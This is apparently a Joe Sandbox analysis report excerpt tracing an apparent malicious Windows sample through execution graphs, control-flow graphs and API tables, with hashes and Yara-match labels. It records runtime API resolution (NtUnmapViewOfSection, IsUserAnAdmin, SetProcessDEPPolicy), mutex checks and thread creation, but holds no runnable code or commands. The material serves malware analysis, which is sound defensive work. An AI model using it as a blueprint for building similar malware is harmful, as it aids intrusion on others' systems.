            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
            • Instruction ID: 50b85dde4be83f48dddb8d43376c5c0b268678affaab1da8eb4b0c913547dabd
            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
            • Instruction Fuzzy Hash: 3211BB75504280DFCB06CF54D5C0B15BBA1FB84224F24C6ADDC494B2A6C37AD44ACB62

            Execution Graph

            Execution Coverage:1.8%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:3.5%
            Total number of Nodes:654
            Total number of Limit Nodes:13
46520 410b5c 137 API calls 46020->46520 46022->45872 46523 411140 38 API calls ___scrt_fastfail 46022->46523 46024 40dc39 CreateThread 46024->45994 46524 401bc9 49 API calls _strftime 46024->46524 46025 40dc8b 46261 40b0a3 7 API calls 46025->46261 46028 432739 46027->46028 46028->45763 46029 44091f 46028->46029 46527 44069c 46029->46527 46032->45745 46033->45749 46034->45754 46035->45759 46036->45765 46037->45751 46038->45771 46039->45773 46044 44cd48 46040->46044 46043 436cfa 8 API calls 3 library calls 46043->45774 46047 44cd65 46044->46047 46048 44cd61 46044->46048 46046 432372 46046->45777 46046->46043 46047->46048 46050 4475a6 46047->46050 46062 432d4b 46048->46062 46051 4475b2 ___scrt_is_nonwritable_in_current_image 46050->46051 46069 442d9a EnterCriticalSection 46051->46069 46053 4475b9 46070 44d363 46053->46070 46055 4475c8 46056 4475d7 46055->46056 46081 44743a 23 API calls 46055->46081 46083 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46056->46083 46059 4475d2 46082 4474f0 GetStdHandle GetFileType 46059->46082 46060 4475e8 ___scrt_is_nonwritable_in_current_image 46060->46047 46063 432d56 IsProcessorFeaturePresent 46062->46063 46064 432d54 46062->46064 46066 432d98 46063->46066 46064->46046 46105 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46066->46105 46068 432e7b 46068->46046 46069->46053 46071 44d36f ___scrt_is_nonwritable_in_current_image 46070->46071 46072 44d393 46071->46072 46073 44d37c 46071->46073 46084 442d9a EnterCriticalSection 46072->46084 46092 43ad91 20 API calls __dosmaperr 46073->46092 46076 44d3cb 46093 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46076->46093 46077 44d39f 46077->46076 46085 44d2b4 46077->46085 46079 44d381 ___scrt_is_nonwritable_in_current_image _strftime 46079->46055 46081->46059 46082->46056 46083->46060 46084->46077 46094 443005 46085->46094 46087 44d2c6 46091 44d2d3 46087->46091 46101 445fb3 11 API calls 2 library calls 46087->46101 46090 44d325 
46090->46077 46102 443c92 20 API calls _free 46091->46102 46092->46079 46093->46079 46099 443012 ___crtLCMapStringA 46094->46099 46095 443052 46104 43ad91 20 API calls __dosmaperr 46095->46104 46096 44303d RtlAllocateHeap 46097 443050 46096->46097 46096->46099 46097->46087 46099->46095 46099->46096 46103 440480 7 API calls 2 library calls 46099->46103 46101->46087 46102->46090 46103->46099 46104->46097 46105->46068 46107 4328dc GetStartupInfoW 46106->46107 46107->45782 46109 44c24b 46108->46109 46110 44c242 46108->46110 46109->45785 46113 44c138 48 API calls 4 library calls 46110->46113 46112->45785 46113->46109 46115 41a919 LoadLibraryA GetProcAddress 46114->46115 46116 41a909 GetModuleHandleA GetProcAddress 46114->46116 46117 41a947 GetModuleHandleA GetProcAddress 46115->46117 46118 41a937 GetModuleHandleA GetProcAddress 46115->46118 46116->46115 46119 41a973 24 API calls 46117->46119 46120 41a95f GetModuleHandleA GetProcAddress 46117->46120 46118->46117 46119->45790 46120->46119 46270 419493 FindResourceA 46121->46270 46124 439adb _Yarn 21 API calls 46125 40ddad _Yarn 46124->46125 46273 402097 46125->46273 46128 401fc2 28 API calls 46129 40ddd3 46128->46129 46130 401fb8 11 API calls 46129->46130 46131 40dddc 46130->46131 46132 439adb _Yarn 21 API calls 46131->46132 46133 40dded _Yarn 46132->46133 46279 4062ee 46133->46279 46135 40de20 46135->45792 46137 4020ec 46136->46137 46138 4023ae 11 API calls 46137->46138 46139 402106 46138->46139 46140 402549 28 API calls 46139->46140 46141 402114 46140->46141 46141->45795 46314 4020bf 46142->46314 46144 419d9a 46148 419e0c 46144->46148 46156 401fc2 28 API calls 46144->46156 46158 401fb8 11 API calls 46144->46158 46163 419e0a 46144->46163 46318 404182 28 API calls 46144->46318 46319 41ab9a 46144->46319 46145 401fb8 11 API calls 46146 419e3c 46145->46146 46147 401fb8 11 API calls 46146->46147 46149 419e44 46147->46149 46330 404182 28 API calls 46148->46330 46152 401fb8 11 API calls 46149->46152 46154 40d43c 46152->46154 
46153 419e18 46155 401fc2 28 API calls 46153->46155 46164 40e563 46154->46164 46157 419e21 46155->46157 46156->46144 46159 401fb8 11 API calls 46157->46159 46158->46144 46160 419e29 46159->46160 46161 41ab9a 28 API calls 46160->46161 46161->46163 46163->46145 46165 40e56f 46164->46165 46167 40e576 46164->46167 46356 402143 11 API calls 46165->46356 46167->45800 46169 402143 46168->46169 46173 40217f 46169->46173 46357 402710 11 API calls 46169->46357 46171 402164 46358 4026f2 11 API calls std::_Deallocate 46171->46358 46173->45802 46175 40e624 46174->46175 46359 40f57c 46175->46359 46181 40d473 46184 401e45 46181->46184 46182 40e663 46182->46181 46375 40f663 46182->46375 46185 401e4d 46184->46185 46186 401e55 46185->46186 46470 402138 22 API calls 46185->46470 46186->45810 46190 40f997 __EH_prolog 46189->46190 46471 40fcfb 46190->46471 46192 40f663 36 API calls 46193 40fb90 46192->46193 46475 40fce0 46193->46475 46195 40d491 46197 40e5ba 46195->46197 46196 40fa1a 46196->46192 46481 40f4c6 46197->46481 46200 40d49a 46202 40dd70 46200->46202 46201 40f663 36 API calls 46201->46200 46491 40e5da 70 API calls 46202->46491 46204 40dd7b 46206 4020bf 11 API calls 46205->46206 46207 40530a 46206->46207 46492 403280 46207->46492 46209 405326 46209->45815 46497 4051cf 46210->46497 46212 408217 46501 402035 46212->46501 46215 401fc2 46216 401fd1 46215->46216 46217 402019 46215->46217 46218 4023ae 11 API calls 46216->46218 46224 401fb8 46217->46224 46219 401fda 46218->46219 46220 40201c 46219->46220 46221 401ff5 46219->46221 46222 40265a 11 API calls 46220->46222 46516 403078 28 API calls 46221->46516 46222->46217 46225 4023ae 11 API calls 46224->46225 46226 401fc1 46225->46226 46226->45829 46228 401fb2 46227->46228 46229 401fa9 46227->46229 46228->45834 46517 4025c0 28 API calls 46229->46517 46231->45842 46232->45862 46233->45873 46234->45845 46235->45863 46236->45865 46237->45891 46238->45865 46239->45876 46240->45950 46241->45953 46242->45918 46243->45958 46244->45962 
46245->45975 46246->45852 46247->45895 46248->45909 46249->45913 46250->45920 46251->45926 46252->45927 46253->45931 46254->45935 46255->45964 46256->45976 46257->46013 46258->46018 46259->46024 46260->46025 46261->46001 46262->46006 46263->46009 46264->46014 46265->45870 46267->45883 46518 418ccd 103 API calls 46269->46518 46271 4194b0 LoadResource LockResource SizeofResource 46270->46271 46272 40dd9e 46270->46272 46271->46272 46272->46124 46274 40209f 46273->46274 46282 4023ae 46274->46282 46276 4020aa 46286 4024ea 46276->46286 46278 4020b9 46278->46128 46280 402097 28 API calls 46279->46280 46281 406302 46280->46281 46281->46135 46283 402408 46282->46283 46284 4023b8 46282->46284 46283->46276 46284->46283 46293 402787 11 API calls std::_Deallocate 46284->46293 46287 4024fa 46286->46287 46288 402500 46287->46288 46289 402515 46287->46289 46294 402549 46288->46294 46304 4028c8 28 API calls 46289->46304 46292 402513 46292->46278 46293->46283 46305 402868 46294->46305 46296 40255d 46297 402572 46296->46297 46298 402587 46296->46298 46310 402a14 22 API calls 46297->46310 46312 4028c8 28 API calls 46298->46312 46301 40257b 46311 4029ba 22 API calls 46301->46311 46303 402585 46303->46292 46304->46292 46306 402870 46305->46306 46307 402878 46306->46307 46313 402c83 22 API calls 46306->46313 46307->46296 46310->46301 46311->46303 46312->46303 46315 4020c7 46314->46315 46316 4023ae 11 API calls 46315->46316 46317 4020d2 46316->46317 46317->46144 46318->46144 46320 41aba7 46319->46320 46321 41ac06 46320->46321 46325 41abb7 46320->46325 46322 41ac20 46321->46322 46323 41ad46 28 API calls 46321->46323 46340 41aec3 28 API calls 46322->46340 46323->46322 46326 41abef 46325->46326 46331 41ad46 46325->46331 46339 41aec3 28 API calls 46326->46339 46327 41ac02 46327->46144 46330->46153 46333 41ad4e 46331->46333 46332 41ad80 46332->46326 46333->46332 46334 41ad84 46333->46334 46337 41ad68 46333->46337 46351 402705 22 API calls 46334->46351 46341 41adb7 46337->46341 46339->46327 
46340->46327 46342 41adc1 __EH_prolog 46341->46342 46352 4026f7 22 API calls 46342->46352 46344 41add4 46353 41aeda 11 API calls 46344->46353 46346 41ae32 46346->46332 46347 41adfa 46347->46346 46354 402710 11 API calls 46347->46354 46349 41ae19 46355 4026f2 11 API calls std::_Deallocate 46349->46355 46352->46344 46353->46347 46354->46349 46355->46346 46356->46167 46357->46171 46358->46173 46379 40f821 46359->46379 46362 40f55d 46457 40f7fb 46362->46457 46364 40f565 46462 40f44c 46364->46462 46366 40e651 46367 40f502 46366->46367 46368 40f510 46367->46368 46369 40f53f std::ios_base::_Ios_base_dtor 46367->46369 46467 4335cb 65 API calls 46368->46467 46369->46182 46371 40f51d 46371->46369 46372 40f44c 20 API calls 46371->46372 46373 40f52e 46372->46373 46468 40fbc8 77 API calls 6 library calls 46373->46468 46376 40f66b 46375->46376 46377 40f67e 46375->46377 46469 40f854 36 API calls 46376->46469 46377->46181 46386 40d2ce 46379->46386 46383 40f83c 46384 40e631 46383->46384 46385 40f663 36 API calls 46383->46385 46384->46362 46385->46384 46387 40d2ff 46386->46387 46388 43229f new 22 API calls 46387->46388 46389 40d306 46388->46389 46396 40cb7a 46389->46396 46392 40f887 46393 40f896 46392->46393 46431 40f8b7 46393->46431 46395 40f89c std::ios_base::_Ios_base_dtor 46395->46383 46399 4332ea 46396->46399 46398 40cb84 46398->46392 46400 4332f6 __EH_prolog3 46399->46400 46411 4330a5 46400->46411 46404 433332 46417 4330fd 46404->46417 46406 433314 46425 43347f 37 API calls _Atexit 46406->46425 46408 43331c 46426 433240 21 API calls _Yarn 46408->46426 46409 433370 std::locale::_Init 46409->46398 46412 4330b4 46411->46412 46413 4330bb 46411->46413 46427 442df9 EnterCriticalSection std::_Lockit::_Lockit 46412->46427 46415 4330b9 46413->46415 46428 43393c EnterCriticalSection 46413->46428 46415->46404 46424 43345a 22 API calls 2 library calls 46415->46424 46418 433107 46417->46418 46419 442e02 46417->46419 46423 43311a 46418->46423 46429 43394a LeaveCriticalSection 46418->46429 
46430 442de2 LeaveCriticalSection 46419->46430 46422 442e09 46422->46409 46423->46409 46424->46406 46425->46408 46426->46404 46427->46415 46428->46415 46429->46423 46430->46422 46432 4330a5 std::_Lockit::_Lockit 2 API calls 46431->46432 46433 40f8c9 46432->46433 46452 40cae9 4 API calls 2 library calls 46433->46452 46435 40f8dc 46445 40f8ef 46435->46445 46453 40ccd4 77 API calls new 46435->46453 46436 4330fd std::_Lockit::~_Lockit 2 API calls 46438 40f925 46436->46438 46438->46395 46439 40f8ff 46440 40f906 46439->46440 46441 40f92d 46439->46441 46454 4332b6 22 API calls new 46440->46454 46455 436ec6 RaiseException 46441->46455 46444 40f943 46446 40f984 46444->46446 46456 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 46444->46456 46445->46436 46446->46395 46452->46435 46453->46439 46454->46445 46455->46444 46458 43229f new 22 API calls 46457->46458 46459 40f80b 46458->46459 46460 40cb7a 41 API calls 46459->46460 46461 40f813 46460->46461 46461->46364 46463 40f469 46462->46463 46465 40f48b 46463->46465 46466 43aa1a 20 API calls 2 library calls 46463->46466 46465->46366 46466->46465 46467->46371 46468->46369 46469->46377 46473 40fd0e 46471->46473 46472 40fd3c 46472->46196 46473->46472 46479 40fe14 36 API calls 46473->46479 46476 40fce8 46475->46476 46478 40fcf3 46476->46478 46480 40fe79 36 API calls __EH_prolog 46476->46480 46478->46195 46479->46472 46480->46478 46482 40f4d4 46481->46482 46483 40f4d0 46481->46483 46489 40f30b 67 API calls 46482->46489 46486 40f44c 20 API calls 46483->46486 46485 40f4d9 46490 43a716 64 API calls 3 library calls 46485->46490 46488 40e5c5 46486->46488 46488->46200 46488->46201 46489->46485 46490->46483 46491->46204 46493 40328a 46492->46493 46495 4032a9 46493->46495 46496 4028c8 28 API calls 46493->46496 46495->46209 46496->46495 46498 4051db 46497->46498 46507 405254 46498->46507 46500 4051e8 46500->46212 46502 402041 46501->46502 46503 4023ae 11 API calls 46502->46503 46504 40205b 
46503->46504 46512 40265a 46504->46512 46508 405262 46507->46508 46511 402884 22 API calls 46508->46511 46513 40266b 46512->46513 46514 4023ae 11 API calls 46513->46514 46515 40206d 46514->46515 46515->46215 46516->46217 46517->46228 46526 411253 61 API calls 46520->46526 46528 4406a8 FindHandlerForForeignException 46527->46528 46529 4406c0 46528->46529 46531 4407f6 _abort GetModuleHandleW 46528->46531 46549 442d9a EnterCriticalSection 46529->46549 46532 4406b4 46531->46532 46532->46529 46561 44083a GetModuleHandleExW 46532->46561 46536 4406c8 46545 44073d 46536->46545 46548 440766 46536->46548 46569 441450 20 API calls _abort 46536->46569 46537 440783 46553 4407b5 46537->46553 46538 4407af 46572 454909 5 API calls ___crtLCMapStringA 46538->46572 46547 440755 46545->46547 46570 441707 5 API calls ___crtLCMapStringA 46545->46570 46571 441707 5 API calls ___crtLCMapStringA 46547->46571 46550 4407a6 46548->46550 46549->46536 46573 442de2 LeaveCriticalSection 46550->46573 46552 44077f 46552->46537 46552->46538 46574 4461f8 46553->46574 46556 4407e3 46559 44083a _abort 8 API calls 46556->46559 46557 4407c3 GetPEB 46557->46556 46558 4407d3 GetCurrentProcess TerminateProcess 46557->46558 46558->46556 46560 4407eb ExitProcess 46559->46560 46562 440864 GetProcAddress 46561->46562 46563 440887 46561->46563 46566 440879 46562->46566 46564 440896 46563->46564 46565 44088d FreeLibrary 46563->46565 46567 432d4b ___crtLCMapStringA 5 API calls 46564->46567 46565->46564 46566->46563 46568 4408a0 46567->46568 46568->46529 46569->46545 46570->46547 46571->46548 46573->46552 46575 44621d 46574->46575 46579 446213 46574->46579 46580 4459f9 46575->46580 46577 432d4b ___crtLCMapStringA 5 API calls 46578 4407bf 46577->46578 46578->46556 46578->46557 46579->46577 46581 445a29 46580->46581 46585 445a25 46580->46585 46581->46579 46582 445a49 46582->46581 46584 445a55 GetProcAddress 46582->46584 46586 445a65 __crt_fast_encode_pointer 46584->46586 46585->46581 46585->46582 46587 445a95 
46585->46587 46586->46581 46588 445ab6 LoadLibraryExW 46587->46588 46593 445aab 46587->46593 46589 445ad3 GetLastError 46588->46589 46590 445aeb 46588->46590 46589->46590 46591 445ade LoadLibraryExW 46589->46591 46592 445b02 FreeLibrary 46590->46592 46590->46593 46591->46590 46592->46593 46593->46585

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
            • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
            • GetProcAddress.KERNEL32(00000000), ref: 0041A912
            • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
            • GetProcAddress.KERNEL32(00000000), ref: 0041A927
            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
            • GetProcAddress.KERNEL32(00000000), ref: 0041A940
            • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
            • GetProcAddress.KERNEL32(00000000), ref: 0041A954
            • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
            • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
            • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
            • GetProcAddress.KERNEL32(00000000), ref: 0041A980
            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
            • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
            • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
            • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
            • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
            • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule$LibraryLoad
            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
            • API String ID: 551388010-2474455403
            • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
            • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
            • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
            • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

            Control-flow Graph

            control_flow_graph 450 4407b5-4407c1 call 4461f8 453 4407e3-4407ef call 44083a ExitProcess 450->453 454 4407c3-4407d1 GetPEB 450->454 454->453 455 4407d3-4407dd GetCurrentProcess TerminateProcess 454->455 455->453
            APIs
            • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
            • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
            • ExitProcess.KERNEL32 ref: 004407EF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
            • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
            • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
            • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

            Control-flow Graph

            control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 135 40dd2c 105->135 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 135->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 
call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 249 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->249 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 225->235 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 249->216 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 
CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->135 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
            APIs
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
              • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
